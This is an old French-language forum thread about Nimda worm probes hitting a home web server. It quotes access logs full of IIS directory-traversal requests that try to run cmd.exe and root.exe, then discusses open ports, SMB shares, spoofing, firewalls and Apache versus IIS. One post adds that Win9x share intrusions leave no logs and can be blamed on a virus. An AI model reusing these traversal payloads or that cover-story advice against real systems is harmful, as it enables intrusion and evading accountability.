ADSL-BC

Quand tu lance ton serveur web, persone n'est spécialement au courrant,mais les machine infectée par ninda envoie des requete a interval régulier vers des IP choisie "a pouf" juste pour essayer de les infectée aussi...

Si tu t'instale un sniffer, ou tout autre truc qui détecte des packet a destination de ton port 80, tu veras: c'est toujour et tout le temps...

des logs de ce style :
Dec/2001:04:50:58 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
Dec/2001:04:51:02 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
Dec/2001:04:51:05 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
Dec/2001:04:51:08 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
Dec/2001:04:51:11 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
Dec/2001:04:51:14 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
Dec/2001:04:51:17 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
Dec/2001:04:51:20 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+di
Dec/2001:04:51:23 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
Dec/2001:04:51:25 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
Dec/2001:04:51:28 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
Dec/2001:04:51:30 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
Dec/2001:04:51:32 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
Dec/2001:04:51:34 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
Dec/2001:04:51:37 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
Dec/2001:04:51:41 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
6/Dec/2001:05:18:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
6/Dec/2001:05:18:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
6/Dec/2001:05:18:12 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
6/Dec/2001:05:18:12 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"

...no comment...

par contre une re-question

Comment on envoit/copie/depose un fichier chez qqun d'autre par un port (80 ou qcq)?
Faut quand meme et'connecté a son HD non?

Telnet?
netbios?

Heu un bon lien pour avoir une description de nimda? (sa vie, son oeuvre)

bien a vous

Ben

Un bon site sur la security et les failles:

http://www.securityfocus.com


ton IIS est bien à jour au moins ?

et bienvenue parmis nous !

Il ne faudrait pas croire que lorsqu'un port est ouvert, on sait directement déposer un fichier sur la machine en question ! Ne faisons pas d'amalgamme !

Pour pouvoir déposer un fichier, il faut qu'il y ait un service à l'écoute sur ce port, et que ce même service, d'une manière où d'une autre, puisse être utilisé de manière à permettre la réception de données...

Prenons l'exemple du port 17 "Quote of the Day"... lorsqu'on se connecte à ce service, celui-ci se borne à nous envoyer "la pensée philosophique du jour"... Et, à moins d'un bug, il n'est pas réceptif à la moidre commande qu'on lui envoie.

En revanche, si l'on prend les ports 21 & 80, serveurs FTP & HTTP, ces serveurs étant conçus pour l'envoi/réception de fichiers (principalement envoi pour le HTTP, mais avec les extensions Frontpage en prenant l'exemple des serveurs IIS, ils permettent aussi la réception de fichiers sur le serveur, notamment pour la mise à jour distante du site, mais bref, je m'éloigne), il est possible d'exploiter des failles de sécurités de ces services pour effectuer des opérations sur le serveur. Le champ de possibilités varie selon l'importance des failles qu'on décèle.

Il est clair que le cas classique du port 139 ouvert est le plus explicite, puisque l'on a un accès direct au HD de la machine ciblée... Et pour ce qui est de faire attention lorsqu'on se balade là-bas, je me réserverai un peu quand même... Dans la mesure où il n'y a pas de logging des accès Samba sur un pc Win9x, il n'y a pas grand risque qu'on puisse remonter jusqu'au lamer qui s'y est attaqué... (Je ne tiens pas compte ici d'éventuels firewall, mais comme certains virus utilisent cette méthode pour se propager, la personne malveillante peur toujours prétexter d'avoir été contaminée par un tel virus, et rien ne permettra de vérifier ses dires).

'est pour ca que la majorité des serveurs sur le web tournent sous Apache

par contre j'ignore si l'ASX tourne dessus... je ne pense pas, mais je me gourre peut etre.

Le 2002-01-15 22:05, BadKarma a écrit:
Ouais, Apache c'est bien mais la sécurité sous linux, c'est pas de la roupie de sansonnet non plus, hein ?

C'est pour ca qu'il existe une version d'Apache sous Windoze....

Faut être drôlement balèse pour éluder/prévenir tous les types d'attaques possibles.

Je dis, pas, c pas evident, mais bon, c'est pas le genre de choses qu'on laisse entre les mains du premier imbécile venu non plus !

Les serveurs les plus troutés que j'aie jamais rencontrés jusqu'à présent tournaient en Linux, ou Unix, c'est dire ! Parce qu'en linux, une faille veut tout de suite dire qu'on rentre avec un 30 tonnes !

Hummmm... je suis perplexe. Ok que les serveurs linux ne sont pas infailibles, mais de par la manière dont les softs sont conçus, dans la mesure où on tient ses logiciels à jour, on risque beaucoup moins d'avoir une faille de sécu sous Linux que sous une plateforme M$...
D'ailleurs, si les serveurs Linux étaient si troutés que cela, m'expliquerais-tu pourquoi les virus qui circulent actuellement exploitent des failles IIS et non Apache ?

La sécurité, tout comme dans le cas de l'alarme de la_dernière_bmw_à_la_mode, c'est surtout une question de temps, à mon sens

C'est un fait certain ! La meilleure manière d'avoir un système sécurisé je pense, est d'avoir un OS "privé", dont la logique de programmation et de fonctionnement n'est connue que des seuls qui s'en servent. Mais c'est bien au-delà de mes pauvres moyens ... et de ceux de beaucoup d'autres aussi je penses

Une bonne Brute force attack à partir d'une adresse IP spoofée et t'es marron, même si t'as le dernier chic_firewall_CIA_breveté

MEEEEEP ! pas trop vite ! Un bon firewall à l'heure actuelle est protégé des attaques utilisant des adresses IP spoofées (vérification que l'adresse du paquet est plausible suivant l'interface à partir de laquelle il rentre). Sans compte que tu oublie probablement aussi les séquences d'initialisation d'une communication TCP...
Ce n'est pas à la portée de n'importe qui, que de pouvoir effectuer ce genre d'attaque à la veuglette. Le source routing dans un réseau bien configuré est désactivé, et sans cela, je conçois mal comment tu comptes prévoir les numéros de séquence que tu devras envoyer afin que le pc cible ne réponde à tes commandes.

C'est pour cela qu'à mon sens, les crétins qui laissent des trous permettant de prendre leur ordis en remote sont aussi dangereux que les hackers : ils en sont les complices à l'insu de leur plein gré !

Un soft comme firewall 1 te permet sans problème de laisser tourner un programme de controle distant sans que celui-ci soit nullement détectable par quelque port scan que ce soit.
Ne sont dangereux que ceux qui ne cherchent pas à regarder plus loin que le bout de leur nez... avec un peu de jugeotte, y'a moyen de se prémunir contre bien des ennuis.

Un topic parlait justement de la sécu des providers l'autre jour...
Un bonhomme qui se plaignait -à juste titre je trouve - de ne pas pouvoir checker son email avec une connexion sécurisée... les mots de passes lors de la relève du compte POP sont donc transmis en clair sur le réseau... Mot de passes, qui bient souvent sont identiques à celui de la connexion Internet. Mais par contre, à côté de ça, on crie au secours parce que le service de contrôle à distance intégré à Windows XP, transmet lui aussi le mot de passe en clair.

C'est quand même dingue parfois comme le monde peut être sot

Hummm... Ca tomberait pas un brin dans l'extrémisme tout ca ? D'ailleurs, cela dit en passant, il faudrait peut être éradiquer tous les extrémistes, ca frait du bien

Non, sérieusement, je pense qu'avant tout, la sécurité est matière d'information.

Le 2002-01-15 23:13, BadKarma a écrit:
(un essieu étant un TRES gros pignon)

Essieu: Pièce disposée transversalement sous un véhicule pour en suporter le poid,...

Pignon: La plus petite des roues dentée d'un engrenage,...Partie supérieur généralement triangulaire d'un mur de batiment,...Pin d'une espece à graine comestible

sortit du petit larousse illustré...

Qui a osé dire qu'un essieu est un gros pignon, pour un peu mon père qui était mécanicien voulait me piquer le clavier pour répondre.

Faudrait se les essuyer hein... Quoi?
Benh t'essieux

ton IIS est bien à jour au moins ?

Je propose une mise à jour radicale :
> telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Sat, 19 Jan 2002 09:57:26 GMT
Server: Apache/1.3.20 (Unix) mod_perl/1.26
Last-Modified: Fri, 18 Jan 2002 17:51:14 GMT
ETag: "f61f7-18a-3c486092"
Accept-Ranges: bytes
Content-Length: 394
Connection: close
Content-Type: text/html

Connection closed by foreign host.

Bein oui, Apache =)